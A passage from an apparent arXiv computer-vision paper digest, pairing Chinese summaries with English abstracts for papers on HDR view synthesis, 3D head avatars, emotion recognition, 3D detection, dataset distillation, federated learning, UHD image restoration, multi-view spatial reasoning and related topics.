类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026
Abstract:High dynamic range novel view synthesis (HDR-NVS) reconstructs scenes with dynamic details by fusing multi-exposure low dynamic range (LDR) views, yet it struggles to capture ambient illumination-dependent appearance. Implicitly supervising HDR content by constraining tone-mapped results fails in correcting abnormal HDR values, and results in limited gradients for Gaussians in under/over-exposed regions. To this end, we introduce PhysHDR-GS, a physically inspired HDR-NVS framework that models scene appearance via intrinsic reflectance and adjustable ambient illumination. PhysHDR-GS employs a complementary image-exposure (IE) branch and Gaussian-illumination (GI) branch to faithfully reproduce standard camera observations and capture illumination-dependent appearance changes, respectively. During training, the proposed cross-branch HDR consistency loss provides explicit supervision for HDR content, while an illumination-guided gradient scaling strategy mitigates exposure-biased gradient starvation and reduces under-densified representations. Experimental results across realistic and synthetic datasets demonstrate our superiority in reconstructing HDR details (e.g., a PSNR gain of 2.04 dB over HDR-GS), while maintaining real-time rendering speed (up to 76 FPS). Code and models are available at this https URL.
[CV-91] Energy-Aware Imitation Learning for Steering Prediction Using Events and Frames
【速读】:该论文旨在解决自动驾驶中仅依赖帧-based相机导致的精度不足问题,尤其在长曝光时间、高速运动和复杂光照条件下表现不佳。其解决方案的关键在于引入一种类生物视觉传感器——事件相机(event camera),该传感器能够捕捉稀疏且异步的事件数据,与传统图像帧形成互补模态。论文提出了一种能量感知的模仿学习框架,通过设计能量驱动的跨模态融合模块(Energy-driven Cross-modality Fusion Module, ECFM)和能量感知解码器,实现对转向指令的可靠且安全预测,从而提升系统在复杂场景下的鲁棒性与性能。
链接: https://arxiv.org/abs/2603.28008
作者: Hu Cao,Jiong Liu,Xingzhuo Yan,Rui Song,Yan Xia,Walter Zimmer,Guang Chen,Alois Knoll
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Submitted to the journal
Abstract:In autonomous driving, relying solely on frame-based cameras can lead to inaccuracies caused by factors like long exposure times, high-speed motion, and challenging lighting conditions. To address these issues, we introduce a bio-inspired vision sensor known as the event camera. Unlike conventional cameras, event cameras capture sparse, asynchronous events that provide a complementary modality to mitigate these challenges. In this work, we propose an energy-aware imitation learning framework for steering prediction that leverages both events and frames. Specifically, we design an Energy-driven Cross-modality Fusion Module (ECFM) and an energy-aware decoder to produce reliable and safe predictions. Extensive experiments on two public real-world datasets, DDD20 and DRFuser, demonstrate that our method outperforms existing state-of-the-art (SOTA) approaches. The codes and trained models will be released upon acceptance.
[CV-92] DipGuava: Disentangling Personalized Gaussian Features for 3D Head Avatars from Monocular Video AAAI2026
【速读】:该论文旨在解决现有3D头像生成方法在动画面部动态时难以捕捉个性化细节的问题,从而限制了头像的真实感和表现力。其解决方案的关键在于提出了一种名为DipGuava(Disentangled and Personalized Gaussian UV Avatar)的新方法,首次显式地将面部外观解耦为两个互补组件:第一阶段学习基于几何驱动的稳定基础外观,以捕捉全局面部结构及粗粒度的表情变化;第二阶段预测第一阶段未包含的个性化残差细节,如高频纹理和非线性变化特征(如皱纹与细微皮肤形变)。通过动态外观融合机制,在变形后整合残差细节,确保空间与语义对齐,从而实现高保真、身份一致的逼真头像重建。
链接: https://arxiv.org/abs/2603.28003
作者: Jeonghaeng Lee,Seok Keun Choi,Zhixuan Li,Weisi Lin,Sanghoon Lee
机构: 1. Korea University(韩国大学); 2. Nanyang Technological University(南洋理工大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: AAAI 2026
Abstract:While recent 3D head avatar creation methods attempt to animate facial dynamics, they often fail to capture personalized details, limiting realism and expressiveness. To fill this gap, we present DipGuava (Disentangled and Personalized Gaussian UV Avatar), a novel 3D Gaussian head avatar creation method that successfully generates avatars with personalized attributes from monocular video. DipGuava is the first method to explicitly disentangle facial appearance into two complementary components, trained in a structured two-stage pipeline that significantly reduces learning ambiguity and enhances reconstruction fidelity. In the first stage, we learn a stable geometry-driven base appearance that captures global facial structure and coarse expression-dependent variations. In the second stage, the personalized residual details not captured in the first stage are predicted, including high-frequency components and nonlinearly varying features such as wrinkles and subtle skin deformations. These components are fused via dynamic appearance fusion that integrates residual details after deformation, ensuring spatial and semantic alignment. This disentangled design enables DipGuava to generate photorealistic, identity-preserving avatars, consistently outperforming prior methods in both visual quality and quantitativeperformance, as demonstrated in extensive experiments.
[CV-93] CLIP-AUTT: Test-Time Personalization with Action Unit Prompting for Fine-Grained Video Emotion Recognition
【速读】:该论文旨在解决情感识别(Emotion Recognition, ER)中因个体差异导致的细微表情难以准确建模的问题,尤其是在视频场景下,现有基于视觉-语言模型(Vision-Language Models, VLMs)如CLIP的方法受限于依赖对比预训练或大语言模型(LLM)生成文本提示所带来的噪声、计算开销高及细粒度表达捕捉能力弱等缺陷。其解决方案的关键在于引入动作单元(Action Units, AUs)作为结构化文本提示嵌入CLIP框架,通过AU引导的时序学习机制(CLIP-AU)实现无需微调CLIP且不依赖LLM监督的细粒度表情建模;进一步提出CLIP-AUTT方法,在测试阶段动态适应未见受试者的视频序列,结合熵引导的时间窗口选择与提示调优策略,实现对个体细微表情差异的个性化适配,同时保持时序一致性。
链接: https://arxiv.org/abs/2603.27999
作者: Muhammad Osama Zeeshan,Masoumeh Sharafi,Benoît Savary,Alessandro Lameiras Koerich,Marco Pedersoli,Eric Granger
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Personalization in emotion recognition (ER) is essential for an accurate interpretation of subtle and subject-specific expressive patterns. Recent advances in vision-language models (VLMs) such as CLIP demonstrate strong potential for leveraging joint image-text representations in ER. However, CLIP-based methods either depend on CLIP’s contrastive pretraining or on LLMs to generate descriptive text prompts, which are noisy, computationally expensive, and fail to capture fine-grained expressions, leading to degraded performance. In this work, we leverage Action Units (AUs) as structured textual prompts within CLIP to model fine-grained facial expressions. AUs encode the subtle muscle activations underlying expressions, providing localized and interpretable semantic cues for more robust ER. We introduce CLIP-AU, a lightweight AU-guided temporal learning method that integrates interpretable AU semantics into CLIP. It learns generic, subject-agnostic representations by aligning AU prompts with facial dynamics, enabling fine-grained ER without CLIP fine-tuning or LLM-generated text supervision. Although CLIP-AU models fine-grained AU semantics, it does not adapt to subject-specific variability in subtle expressions. To address this limitation, we propose CLIP-AUTT, a video-based test-time personalization method that dynamically adapts AU prompts to videos from unseen subjects. By combining entropy-guided temporal window selection with prompt tuning, CLIP-AUTT enables subject-specific adaptation while preserving temporal consistency. Our extensive experiments on three challenging video-based subtle ER datasets, BioVid, StressID, and BAH, indicate that CLIP-AU and CLIP-AUTT outperform state-of-the-art CLIP-based FER and TTA methods, achieving robust and personalized subtle ER.
[CV-94] UniDA3D: A Unified Domain-Adaptive Framework for Multi-View 3D Object Detection
【速读】:该论文旨在解决相机-only多视角3D目标检测在复杂环境条件下(如夜间、雨天和雾天)性能显著下降的问题,其根源在于现有方法主要依赖理想光照与天气条件下的训练数据。解决方案的关键在于提出UniDA3D,一个统一的域自适应多视角3D检测框架,将不同恶劣场景建模为统一的多目标域自适应问题,并引入查询引导的域差异缓解(Query Guided Domain Discrepancy Mitigation, QDDM)模块,通过查询中心的对抗学习与对比学习,在批次级和全局级实现源域与目标域间物体特征对齐;同时设计了一种域自适应教师-学生训练流程,结合指数移动平均教师模型与动态更新的高质量伪标签,增强一致性学习并抑制未标注目标域中的背景噪声,从而实现单一统一训练过程下跨多种恶劣环境的鲁棒感知能力。
链接: https://arxiv.org/abs/2603.27995
作者: Hongjing Wu,Cheng Chi,Jinlin Wu,Yanzhao Su,Zhen Lei,Wenqi Ren
机构: Sun Yat-sen University (中山大学); Zhejiang University (浙江大学); Beijing Academy of Artificial Intelligence (北京人工智能研究院); National Laboratory of Pattern Recognition, Institute of Automation, Chinese Academy of Sciences (中国科学院自动化研究所模式识别国家重点实验室); Xi’an Research Institute of High-tech (西安高技术研究院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Camera-only 3D object detection is critical for autonomous driving, offering a cost-effective alternative to LiDAR based methods. In particular, multi-view 3D object detection has emerged as a promising direction due to its balanced trade-off between performance and cost. However, existing methods often suffer significant performance degradation under complex environmental conditions such as nighttime, fog, and rain, primarily due to their reliance on training data collected mostly in ideal conditions. To address this challenge, we propose UniDA3D, a unified domain-adaptive multi-view 3D object detector designed for robust perception under diverse adverse conditions. UniDA3D formulates nighttime, rainy, and foggy scenes as a unified multi target domain adaptation problem and leverages a novel query guided domain discrepancy mitigation (QDDM) module to align object features between source and target domains at both batch and global levels via query-centric adversarial and contrastive learning. Furthermore, we introduce a domain-adaptive teacher student training pipeline with an exponential-moving-average teacher and dynamically updated high-quality pseudo labels to enhance consistency learning and suppress background noise in unlabeled target domains. In contrast to prior approaches that require separate training for each condition, UniDA3D performs a single unified training process across multiple domains, enabling robust all-weather 3D perception. On a synthesized multi-view 3D benchmark constructed by generating nighttime, rainy, and foggy counterparts from nuScenes (nuScenes-Night, nuScenes-Rain, and nuScenes-Haze), UniDA3D consistently outperforms state of-the-art camera-only multi-view 3D detectors under extreme conditions, achieving substantial gains in mAP and NDS while maintaining real-time inference efficiency.
[CV-95] Progressive Prompt-Guided Cross-Modal Reasoning for Referring Image Segmentation
【速读】:该论文旨在解决参考图像分割(referring image segmentation)中如何有效将自然语言描述与图像中的目标对象视觉表征进行对齐的问题,尤其针对包含详细属性和复杂对象间关系的指代表达。现有方法多依赖跨模态对齐或语义分割提示(Semantic Segmentation Prompt),但缺乏显式的推理机制来实现语言到图像区域的精准定位。解决方案的关键在于提出一种渐进式提示引导的跨模态推理框架(Progressive Prompt-guided Cross-modal Reasoning, PPCR),其核心结构为“语义理解—空间定位—实例分割”的三阶段流程:首先利用多模态大语言模型(Multimodal Large Language Models, MLLMs)生成捕捉目标关键语义线索的语义分割提示;随后基于该语义上下文进一步生成空间分割提示以推理目标位置与空间范围,实现从语义理解到空间定位的渐进过渡;最终将两类提示联合注入分割模块,显著提升目标定位与分割精度。
链接: https://arxiv.org/abs/2603.27993
作者: Jiachen Li,Hongyun Wang,Jinyu Xu,Wenbo Jiang,Yanchun Ma,Yongjian Liu,Qing Xie,Bolong Zheng
机构: Wuhan University of Technology (武汉理工大学); Huazhong University of Science and Technology (华中科技大学); University of Electronic Science and Technology of China (电子科技大学); Wuhan Vocational College of Software and Engineering (武汉软件工程职业学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Referring image segmentation aims to localize and segment a target object in an image based on a free-form referring expression. The core challenge lies in effectively bridging linguistic descriptions with object-level visual representations, especially when referring expressions involve detailed attributes and complex inter-object relationships. Existing methods either rely on cross-modal alignment or employ Semantic Segmentation Prompts, but they often lack explicit reasoning mechanisms for grounding language descriptions to target regions in the image. To address these limitations, we propose PPCR, a Progressive Prompt-guided Cross-modal Reasoning framework for referring image segmentation. PPCR explicitly structures the reasoning process as a Semantic Understanding-Spatial Grounding-Instance Segmentation pipeline. Specifically, PPCR first employs multimodal large language models (MLLMs) to generate Semantic Segmentation Prompt that capture key semantic cues of the target object. Based on this semantic context, Spatial Segmentation Prompt are further generated to reason about object location and spatial extent, enabling a progressive transition from semantic understanding to spatial grounding. The Semantic and Spatial Segmentation prompts are then jointly integrated into the segmentation module to guide accurate target localization and segmentation. Extensive experiments on standard referring image segmentation benchmarks demonstrate that PPCR consistently outperforms existing methods. The code will be publicly released to facilitate reproducibility.
[CV-96] Beyond Dataset Distillation: Lossless Dataset Concentration via Diffusion-Assisted Distribution Alignment
【速读】:该论文旨在解决大规模视觉识别系统中因数据集成本高、获取困难而导致的训练效率与可扩展性问题。现有基于扩散模型的数据集蒸馏方法存在理论依据不足、难以扩展至高数据量以及无法在无原始数据场景下应用等缺陷。解决方案的关键在于提出一个名为Dataset Concentration (DsCo) 的新框架,其核心是通过扩散模型驱动的Noise-Optimization (NOpt) 方法合成少量但具有代表性的样本,并引入“Doping”策略——将原始数据中精选样本与合成样本混合,从而突破数据蒸馏固有的效率瓶颈。该方法在有/无原始数据场景下均适用,在低数据量时达到当前最优性能,并能高效扩展至高数据量,实现数据集规模减半而性能无损。
链接: https://arxiv.org/abs/2603.27987
作者: Tongfei Liu,Yufan Liu,Bing Li,Weiming Hu
机构: Chinese Academy of Sciences (中国科学院); Institute of Automation, Chinese Academy of Sciences (中国科学院自动化研究所)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:The high cost and accessibility problem associated with large datasets hinder the development of large-scale visual recognition systems. Dataset Distillation addresses these problems by synthesizing compact surrogate datasets for efficient training, storage, transfer, and privacy preservation. The existing state-of-the-art diffusion-based dataset distillation methods face three issues: lack of theoretical justification, poor efficiency in scaling to high data volumes, and failure in data-free scenarios. To address these issues, we establish a theoretical framework that justifies the use of diffusion models by proving the equivalence between dataset distillation and distribution matching, and reveals an inherent efficiency limit in the dataset distillation paradigm. We then propose a Dataset Concentration (DsCo) framework that uses a diffusion-based Noise-Optimization (NOpt) method to synthesize a small yet representative set of samples, and optionally augments the synthetic data via “Doping”, which mixes selected samples from the original dataset with the synthetic samples to overcome the efficiency limit of dataset distillation. DsCo is applicable in both data-accessible and data-free scenarios, achieving SOTA performances for low data volumes, and it extends well to high data volumes, where it nearly reduces the dataset size by half with no performance degradation.
[CV-97] FedFG: Privacy-Preserving and Robust Federated Learning via Flow-Matching Generation
【速读】:该论文旨在解决联邦学习(Federated Learning, FL)中隐私保护不足与模型聚合鲁棒性差的问题,即传统FL算法在面对数据泄露风险和中毒攻击(poisoning attacks)时存在安全漏洞。其解决方案的关键在于提出FedFG框架,通过客户端侧的特征解耦(私有特征提取器与公共分类器分离)和基于流匹配生成(flow-matching generation)的隐私保护机制,使客户端在上传过程中用生成器替代真实特征提取器,从而保护原始私有数据的同时学习数据分布近似;服务器端则引入基于合成样本的客户端更新验证机制与新型鲁棒聚合策略,有效抵御恶意客户端发起的中毒攻击,并提升全局模型的准确性与稳定性。
链接: https://arxiv.org/abs/2603.27986
作者: Ruiyang Wang,Rong Pan,Zhengan Yao
机构: Sun Yat-sen University (中山大学); Institute of Advanced Studies Hong Kong (香港中山大学高等研究院)
类目: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:Federated learning (FL) enables distributed clients to collaboratively train a global model using local private data. Nevertheless, recent studies show that conventional FL algorithms still exhibit deficiencies in privacy protection, and the server lacks a reliable and stable aggregation rule for updating the global model. This situation creates opportunities for adversaries: on the one hand, they may eavesdrop on uploaded gradients or model parameters, potentially leaking benign clients’ private data; on the other hand, they may compromise clients to launch poisoning attacks that corrupt the global model. To balance accuracy and security, we propose FedFG, a robust FL framework based on flow-matching generation that simultaneously preserves client privacy and resists sophisticated poisoning attacks. On the client side, each local network is decoupled into a private feature extractor and a public classifier. Each client is further equipped with a flow-matching generator that replaces the extractor when interacting with the server, thereby protecting private features while learning an approximation of the underlying data distribution. Complementing the client-side design, the server employs a client-update verification scheme and a novel robust aggregation mechanism driven by synthetic samples produced by the flow-matching generator. Experiments on MNIST, FMNIST, and CIFAR-10 demonstrate that, compared with prior work, our approach adapts to multiple attack strategies and achieves higher accuracy while maintaining strong privacy protection.
[CV-98] RetinexDualV2: Physically-Grounded Dual Retinex for Generalized UHD Image Restoration
【速读】:该论文旨在解决超高清(Ultra-High-Definition, UHD)图像复原中多种复杂退化类型(如雨滴、低光照和噪声)的统一建模与高效处理问题。现有方法通常针对特定退化设计专用结构,缺乏通用性和物理可解释性。其解决方案的关键在于提出RetinexDualV2框架,通过任务特异性物理接地模块(Task-Specific Physical Grounding Module, TS-PGM)提取退化感知先验(如雨滴掩码和暗通道),并利用新颖的物理条件多头自注意力机制(Physical-conditioned Multi-head Self-Attention, PC-MSA)将这些先验显式引导至Retinex分解网络,从而实现反射与光照分量的鲁棒校正。该物理约束机制使单一架构能够无缝适应多种复杂退化,无需任务特定结构调整,显著提升了模型的泛化能力与性能。
链接: https://arxiv.org/abs/2603.27979
作者: Mohab Kishawy,Jun Chen
机构: McMaster University (麦克马斯特大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:We propose RetinexDualV2, a unified, physically grounded dual-branch framework for diverse Ultra-High-Definition (UHD) image restoration. Unlike generic models, our method employs a Task-Specific Physical Grounding Module (TS-PGM) to extract degradation-aware priors (e.g., rain masks and dark channels). These explicitly guide a Retinex decomposition network via a novel Physical-conditioned Multi-head Self-Attention (PC-MSA) mechanism, enabling robust reflection and illumination correction. This physical conditioning allows a single architecture to handle various complex degradations seamlessly, without task-specific structural modifications. RetinexDualV2 demonstrates exceptional generalizability, securing 4\textsuperscriptth place in the NTIRE 2026 Day and Night Raindrop Removal Challenge and 5\textsuperscriptth place in the Joint Noise Low-light Enhancement (JNLLIE) Challenge. Extensive experiments confirm the state-of-the-art performance and efficiency of our physically motivated approach.
[CV-99] AffordMatcher: Affordance Learning in 3D Scenes from Visual Signifiers CVPR2026
【速读】:该论文旨在解决场景级功能交互区域(affordance regions)的识别难题,即如何在复杂室内场景中准确地从几何结构、视觉信息和语义标签中学习并定位可交互区域。现有方法多聚焦于单个物体层面的感知,难以有效扩展至场景级理解。其解决方案的关键在于提出AffordBridge数据集与AffordMatcher方法:前者提供了包含291,637条功能性交互标注的高分辨率点云场景数据;后者通过建立图像与点云之间实例级别的语义对应关系,实现基于视觉标志符(visual signifiers)的关键点匹配,从而更精确地识别出具有功能意义的交互区域。
链接: https://arxiv.org/abs/2603.27970
作者: Nghia Vu,Tuong Do,Khang Nguyen,Baoru Huang,Nhat Le,Binh Xuan Nguyen,Erman Tjiputra,Quang D. Tran,Ravi Prakash,Te-Chuan Chiu,Anh Nguyen
机构: University of Liverpool (利物浦大学); AIOZ Ltd. (AIOZ有限公司); National Tsing Hua University (台湾清华大学); MBZUAI; University of Western Australia (西澳大利亚大学); Indian Institute of Science (印度科学研究所); NVIDIA (英伟达)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 14 pages. Accepted to CVPR 2026
Abstract:Affordance learning is a complex challenge in many applications, where existing approaches primarily focus on the geometric structures, visual knowledge, and affordance labels of objects to determine interactable regions. However, extending this learning capability to a scene is significantly more complicated, as incorporating object- and scene-level semantics is not straightforward. In this work, we introduce AffordBridge, a large-scale dataset with 291,637 functional interaction annotations across 685 high-resolution indoor scenes in the form of point clouds. Our affordance annotations are complemented by RGB images that are linked to the same instances within the scenes. Building upon our dataset, we propose AffordMatcher, an affordance learning method that establishes coherent semantic correspondences between image-based and point cloud-based instances for keypoint matching, enabling a more precise identification of affordance regions based on cues, so-called visual signifiers. Experimental results on our dataset demonstrate the effectiveness of our approach compared to other methods.
[CV-100] Hg-I2P: Bridging Modalities for Generalizable Image-to-Point-Cloud Registration via Heterogeneous Graphs CVPR2026
【速读】:该论文旨在解决图像到点云(Image-to-point-cloud, I2P)配准中因模态差异导致的特征判别性与泛化能力不足的问题,尤其在未见场景下性能显著下降。其核心解决方案是提出一种异构图嵌入方法(Hg-I2P),关键在于构建一个连接2D图像分割区域与3D点云区域的异构图(heterogeneous graph),通过多路径特征关系挖掘实现跨模态特征的精炼与自适应调整,并利用图结构中的顶点与边一致性约束来剔除不可靠对应关系,从而提升特征判别力和配准精度。
链接: https://arxiv.org/abs/2603.27969
作者: Pei An,Junfeng Ding,Jiaqi Yang,Yulong Wang,Jie Ma,Liangliang Nan
机构: Huazhong University of Science and Technology (华中科技大学); Northwestern Polytechnical University (西北工业大学); Huazhong Agricultural University (华中农业大学); Delft University of Technology (代尔夫特理工大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026
Abstract:Image-to-point-cloud (I2P) registration aims to align 2D images with 3D point clouds by establishing reliable 2D-3D correspondences. The drastic modality gap between images and point clouds makes it challenging to learn features that are both discriminative and generalizable, leading to severe performance drops in unseen scenarios. We address this challenge by introducing a heterogeneous graph that enables refining both cross-modal features and correspondences within a unified architecture. The proposed graph represents a mapping between segmented 2D and 3D regions, which enhances cross-modal feature interaction and thus improves feature discriminability. In addition, modeling the consistency among vertices and edges within the graph enables pruning of unreliable correspondences. Building on these insights, we propose a heterogeneous graph embedded I2P registration method, termed Hg-I2P. It learns a heterogeneous graph by mining multi-path feature relationships, adapts features under the guidance of heterogeneous edges, and prunes correspondences using graph-based projection consistency. Experiments on six indoor and outdoor benchmarks under cross-domain setups demonstrate that Hg-I2P significantly outperforms existing methods in both generalization and accuracy. Code is released on this https URL. Comments: Accepted to CVPR 2026 Subjects: Computer Vision and Pattern Recognition (cs.CV) MSC classes: None Cite as: arXiv:2603.27969 [cs.CV] (or arXiv:2603.27969v1 [cs.CV] for this version) https://doi.org/10.48550/arXiv.2603.27969 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[CV-101] Learning Multi-View Spatial Reasoning from Cross-View Relations CVPR2026
【速读】:该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)在多视角空间推理能力上的不足,这是其在具身人工智能(Embodied AI)系统中理解三维环境和跨视角操作物体的关键瓶颈。现有VLMs虽在单视图任务上表现优异,但缺乏对不同视角间空间关系的建模能力。解决方案的核心是提出一个大规模数据集Cross-View Relations (XVR),包含10万条视觉-问题-答案样本,源自1.8万个多样化3D场景和7万条机器人操作轨迹,涵盖三类基础空间推理任务:对应关系(Correspondence)、验证(Verification)和定位(Localization)。通过在XVR上微调VLMs,显著提升了在MindCube和RoboSpatial等多视角与机器人空间推理基准上的性能,并进一步增强Vision-Language-Action模型在RoboCasa任务中的成功率,证明了显式训练跨视角空间关系对多视角推理能力和现实机器人操作的迁移有效性。
链接: https://arxiv.org/abs/2603.27967
作者: Suchae Jeong,Jaehwi Song,Haeone Lee,Hanna Kim,Jian Kim,Dongjun Lee,Dong Kyu Shin,Changyeon Kim,Dongyoon Hahm,Woogyeol Jin,Juheon Choi,Kimin Lee
机构: KAIST(韩国科学技术院); Config; Hanyang University(汉阳大学); Yonsei University(延世大学); Seoul National University(首尔国立大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026
Abstract:Vision-language models (VLMs) have achieved impressive results on single-view vision tasks, but lack the multi-view spatial reasoning capabilities essential for embodied AI systems to understand 3D environments and manipulate objects across different viewpoints. In this work, we introduce Cross-View Relations (XVR), a large-scale dataset designed to teach VLMs spatial reasoning across multiple views. XVR comprises 100K vision-question-answer samples derived from 18K diverse 3D scenes and 70K robotic manipulation trajectories, spanning three fundamental spatial reasoning tasks: Correspondence (matching objects across views), Verification (validating spatial relationships), and Localization (identifying object positions). VLMs fine-tuned on XVR achieve substantial improvements on established multi-view and robotic spatial reasoning benchmarks (MindCube and RoboSpatial). When integrated as backbones in Vision-Language-Action models, XVR-trained representations improve success rates on RoboCasa. Our results demonstrate that explicit training on cross-view spatial relations significantly enhances multi-view reasoning and transfers effectively to real-world robotic manipulation.
[CV-102] ExFusion: Efficient Transformer Training via Multi-Experts Fusion
【速读】:该论文旨在解决混合专家(Mixture-of-Experts, MoE)模型在训练和部署过程中因参数量大、计算资源消耗高以及存储开销显著而带来的效率瓶颈问题。其解决方案的关键在于提出一种名为ExFusion的预训练方法,通过在初始化阶段将Transformer中的前馈网络(Feed-Forward Network, FFN)重构为多专家结构,并为每个专家分配可学习权重;在训练过程中,这些权重使多个专家能够融合为一个等效于原始FFN的统一专家,从而在不增加额外计算负担的前提下引入多专家能力;训练完成后,利用学习到的权重将多专家整合为单一专家,彻底消除部署时的额外存储与计算开销,实现了高效且高性能的Transformer训练与应用。
链接: https://arxiv.org/abs/2603.27965
作者: Jiacheng Ruan,Daize Dong,Xiaoye Qu,Tong Zhu,Ting Liu,Yuzhuo Fu,Yu Cheng,Suncheng Xiang
机构: Shanghai Jiao Tong University (上海交通大学); Shanghai Artificial Intelligence Laboratory (上海人工智能实验室); Huazhong University of Science and Technology (华中科技大学); Soochow University (苏州大学); Chinese University of Hong Kong (香港中文大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by IEEE TMM2026
Abstract:Mixture-of-Experts (MoE) models substantially improve performance by increasing the capacity of dense architectures. However, directly training MoE models requires considerable computational resources and introduces extra overhead in parameter storage and deployment. Therefore, it is critical to develop an approach that leverages the multi-expert capability of MoE to enhance performance while incurring minimal additional cost. To this end, we propose a novel pre-training approach, termed ExFusion, which improves the efficiency of Transformer training through multi-expert fusion. Specifically, during the initialization phase, ExFusion upcycles the feed-forward network (FFN) of the Transformer into a multi-expert configuration, where each expert is assigned a weight for later parameter fusion. During training, these weights allow multiple experts to be fused into a single unified expert equivalent to the original FFN, which is subsequently used for forward computation. As a result, ExFusion introduces multi-expert characteristics into the training process while incurring only marginal computational cost compared to standard dense training. After training, the learned weights are used to integrate multi-experts into a single unified expert, thereby eliminating additional overhead in storage and deployment. Extensive experiments on a variety of computer vision and natural language processing tasks demonstrate the effectiveness of the proposed method.
[CV-103] MathGen: Revealing the Illusion of Mathematical Competence through Text-to-Image Generation
【速读】:该论文旨在解决生成式 AI(Generative AI)在数学视觉表达任务中的能力瓶颈问题,即如何准确地将数学解以图表、图像、几何构造和结构化符号布局等形式可视化呈现,而不仅仅是文本形式。其解决方案的关键在于构建了一个名为 MathGen 的严格基准测试集,包含 900 道涵盖七个核心数学领域的题目,并采用“Script-as-a-Judge”协议对每道题的生成结果进行可执行验证,从而实现确定性和客观的评估。这一设计使得模型在数学视觉生成任务上的性能得以量化比较,揭示了当前文本到图像(Text-to-Image, T2I)模型在结构化数学可视化任务中仍存在显著不足,尤其开放源代码模型表现极差,最高仅达 11%,而最优闭源模型也仅达到 42.0% 的整体准确率。
链接: https://arxiv.org/abs/2603.27959
作者: Ruiyao Liu,Hui Shen,Ping Zhang,Yunta Hsieh,Yifan Zhang,Jing Xu,Sicheng Chen,Junchen Li,Jiawei Lu,Jianing Ma,Jiaqi Mo,Qi Han,Zhen Zhang,Zhongwei Wan,Jing Xiong,Xin Wang,Ziyuan Liu,Hangrui Cao,Ngai Wong
机构: University of Pennsylvania (宾夕法尼亚大学); University of Michigan (密歇根大学); The Ohio State University (俄亥俄州立大学); USTC (中国科学技术大学); City University of Hong Kong (香港城市大学); University of Wisconsin (威斯康星大学); Independent (独立); UCSB (加州大学圣塔芭芭拉分校); University of Hong Kong (香港大学); Peking University (北京大学); Carnegie Mellon University (卡内基梅隆大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Modern generative models have demonstrated the ability to solve challenging mathematical problems. In many real-world settings, however, mathematical solutions must be expressed visually through diagrams, plots, geometric constructions, and structured symbolic layouts, where correctness depends on precise visual composition. Can generative models still do so when the answer must be rendered visually rather than written in text? To study this problem, we introduce MathGen, a rigorous benchmark of 900 problems spanning seven core domains, each paired with an executable verifier under a Script-as-a-Judge protocol for deterministic and objective evaluation. Experiments on representative open-source and proprietary text-to-image models show that mathematical fidelity remains a major bottleneck: even the best closed-source model reaches only 42.0% overall accuracy, while open-source models achieve just ~ 1-11%, often near 0% on structured tasks. Overall, current T2I models remain far from competent at even elementary mathematical visual generation.
[CV-104] RehearsalNeRF: Decoupling Intrinsic Neural Fields of Dynamic Illuminations for Scene Editing
【速读】:该论文旨在解决神经辐射场(Neural Radiance Fields, NeRF)在动态光照变化下难以实现有效解耦的问题,尤其针对场景中主体辐射与自发光及光照颜色在时空域高度纠缠的挑战。其解决方案的关键在于引入一种名为 RehearsalNeRF 的新方法,该方法利用在稳定光照条件下(如排练舞台)预先捕获的场景数据,强制不同光照条件下的几何一致性;并通过一个可学习的光照向量来表征时间维度上的光照颜色,从而将投影的光照颜色从场景辐射中解耦出来。此外,该方法还通过光学流(optical flow)设计了一种新的正则化策略,为颜色解耦提供粗粒度监督,并能仅依赖现成的交互式掩码实现动态物体的重建与分离。
链接: https://arxiv.org/abs/2603.27948
作者: Changyeon Won,Hyunjun Jung,Jungu Cho,Seonmi Park,Chi-Hoon Lee,Hae-Gon Jeon
机构: GIST (韩国科学技术院); CJ (CJ集团); Yonsei University (延世大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to the International Journal of Computer Vision (IJCV). Changyeon Won and Hyunjun Jung contributed equally to this work
Abstract:Although there has been significant progress in neural radiance fields, an issue on dynamic illumination changes still remains unsolved. Different from relevant works that parameterize time-variant/-invariant components in scenes, subjects’ radiance is highly entangled with their own emitted radiance and lighting colors in spatio-temporal domain. In this paper, we present a new effective method to learn disentangled neural fields under the severe illumination changes, named RehearsalNeRF. Our key idea is to leverage scenes captured under stable lighting like rehearsal stages, easily taken before dynamic illumination occurs, to enforce geometric consistency between the different lighting conditions. In particular, RehearsalNeRF employs a learnable vector for lighting effects which represents illumination colors in a temporal dimension and is used to disentangle projected light colors from scene radiance. Furthermore, our RehearsalNeRF is also able to reconstruct the neural fields of dynamic objects by simply adopting off-the-shelf interactive masks. To decouple the dynamic objects, we propose a new regularization leveraging optical flow, which provides coarse supervision for the color disentanglement. We demonstrate the effectiveness of RehearsalNeRF by showing robust performances on novel view synthesis and scene editing under dynamic illumination conditions. Our source code and video datasets will be publicly available.
[CV-105] JaWildText: A Benchmark for Vision-Language Models on Japanese Scene Text Understanding
